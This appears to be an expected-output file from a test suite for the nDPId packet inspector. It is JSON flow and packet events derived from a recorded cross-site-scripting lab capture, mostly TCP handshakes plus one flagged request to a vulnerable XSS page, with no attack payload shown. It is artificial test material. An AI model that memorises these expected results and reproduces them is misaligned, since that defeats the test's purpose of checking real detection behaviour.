-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1499347091103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347091103,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uhZAAD4GC8KsEAABwKgKMtEMAFDkONpokqZfX4AQAOXlcAAAAQEICgE5YHID4zHp"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1065,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347092374,"flow_last_seen":1499347092374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347092374,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1065,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1499347092374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347092374,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rL1AAD4GGROsEAABwKgKMtEaAFBpN80NAAAAAKACchD0agAAAgQFtAQCCAoBOWGwAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1066,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1499347092375,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347092375,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0RpaHI+7aTfNDqAScSDUZwAAAgQFtAQCCAoD4zMnATlhsAEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1067,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1499347092375,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347092375,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rL5AAD4GGRqsEAABwKgKMtEaAFBpN80OWhyPvIAQAOVzbwAAAQEICgE5YbAD4zMn"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347093662,"flow_last_seen":1499347093662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347093662,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53544,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1499347093662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347093662,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Ku9AAD4GmuGsEAABwKgKMtEoAFAtsEgdAAAAAKACchCzkgAAAgQFtAQCCAoBOWLyAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1499347093662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347093662,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Shd8PQZLbBIHqAScSAqGwAAAgQFtAQCCAoD4zRpATli8gEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1499347093663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347093663,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KvBAAD4GmuisEAABwKgKMtEoAFAtsEgeXfD0GoAQAOXJIgAAAQEICgE5YvID4zRp"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347096201,"flow_last_seen":1499347096201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347096201,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1499347096201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347096201,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZsxAAD4GXwSsEAABwKgKMtFCAFCngwOhAAAAAKACchB7pgAAAgQFtAQCCAoBOWVtAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1499347096202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347096202,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0UJnxk6+p4MDoqAScSCLOQAAAgQFtAQCCAoD4zbkATllbQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1499347096202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347096202,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Zs1AAD4GXwusEAABwKgKMtFCAFCngwOiZ8ZOv4AQAOUqQQAAAQEICgE5ZW0D4zbk"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1107,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347097460,"flow_last_seen":1499347097460,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347097460,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1107,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1499347097460,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347097460,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83YdAAD4G6EisEAABwKgKMtFQAFAbC7sgAAAAAKACchBPVwAAAgQFtAQCCAoBOWanAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1499347097460,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347097460,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0VBz69jzGwu7IaAScSDHVQAAAgQFtAQCCAoD4zgeATlmpwEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1109,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1499347097460,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347097460,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03YhAAD4G6E+sEAABwKgKMtFQAFAbC7shc+vY9IAQAOVmXAAAAQEICgE5ZqgD4zge"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347098746,"flow_last_seen":1499347098746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347098746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1499347098746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347098746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gixAAD4GQ6SsEAABwKgKMtFeAFA\/7+XFAAAAAKACchD+fQAAAgQFtAQCCAoBOWfpAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1499347098746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347098746,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0V6c5l18P+\/lxqAScSDHtgAAAgQFtAQCCAoD4zlgATln6QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1121,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1499347098747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347098747,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gi1AAD4GQ6usEAABwKgKMtFeAFA\/7+XGnOZdfYAQAOVmvgAAAQEICgE5Z+kD4zlg"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347101314,"flow_last_seen":1499347101314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347101314,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1499347101314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347101314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HlBAAD4Gp4CsEAABwKgKMtF4AFDPTHQ7AAAAAKACchDeDgAAAgQFtAQCCAoBOWprAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1499347101314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347101314,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0XjCGItuz0x0PKAScSBRoQAAAgQFtAQCCAoD4zviATlqawEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1499347101315,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347101315,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HlFAAD4Gp4esEAABwKgKMtF4AFDPTHQ8whiLb4AQAOXwqAAAAQEICgE5amsD4zvi"} -00972{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347097460,"flow_last_seen":1499347102358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347102358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347102609,"flow_last_seen":1499347102609,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347102609,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1499347102609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347102609,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ux5AAD4GCrKsEAABwKgKMtGGAFBKzdCxAAAAAKACchAExgAAAgQFtAQCCAoBOWuvAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1499347102609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347102609,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0YYGn50FSs3QsqAScSAg+AAAAgQFtAQCCAoD4z0lATlrrwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1155,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1499347102610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347102610,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ux9AAD4GCrmsEAABwKgKMtGGAFBKzdCyBp+dBoAQAOW\/\/wAAAQEICgE5a68D4z0l"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347105154,"flow_last_seen":1499347105154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347105154,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1499347105154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347105154,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eX9AAD4GTFGsEAABwKgKMtGgAFC6fhdUAAAAAKACchBL3AAAAgQFtAQCCAoBOW4rAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1499347105154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347105154,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0aA4hAGdun4XVaAScSDPFAAAAgQFtAQCCAoD4z+iATluKwEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1499347105154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347105154,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eYBAAD4GTFisEAABwKgKMtGgAFC6fhdVOIQBnoAQAOVuHAAAAQEICgE5bisD4z+i"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347106438,"flow_last_seen":1499347106438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347106438,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1499347106438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347106438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8kWRAAD4GNGysEAABwKgKMtGuAFDha\/4IAAAAAKACchA86wAAAgQFtAQCCAoBOW9sAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1499347106438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347106438,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0a4RPd924Wv+CaAScSAIUAAAAgQFtAQCCAoD40DjATlvbAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1182,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1499347106439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347106439,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kWVAAD4GNHOsEAABwKgKMtGuAFDha\/4JET3fd4AQAOWnVwAAAQEICgE5b2wD40Dj"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347107719,"flow_last_seen":1499347107719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347107719,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1499347107719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347107719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GMdAAD4GrQmsEAABwKgKMtG8AFANSWhrAAAAAKACchClXQAAAgQFtAQCCAoBOXCsAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1196,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1499347107719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347107719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0byrN2AMDUlobKAScSBU8gAAAgQFtAQCCAoD40IjATlwrAEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1499347107720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347107720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GMhAAD4GrRCsEAABwKgKMtG8AFANSWhsqzdgDYAQAOXz+AAAAQEICgE5cK0D40Ij"} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1499346976677,"flow_last_seen":1499346982914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5330,"flow_tot_l4_payload_len":6852,"flow_avg_l4_payload_len":527,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499346976999,"flow_last_seen":1499346982906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1707,"flow_tot_l4_payload_len":2065,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346976999,"flow_last_seen":1499346982607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346976999,"flow_last_seen":1499346982607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 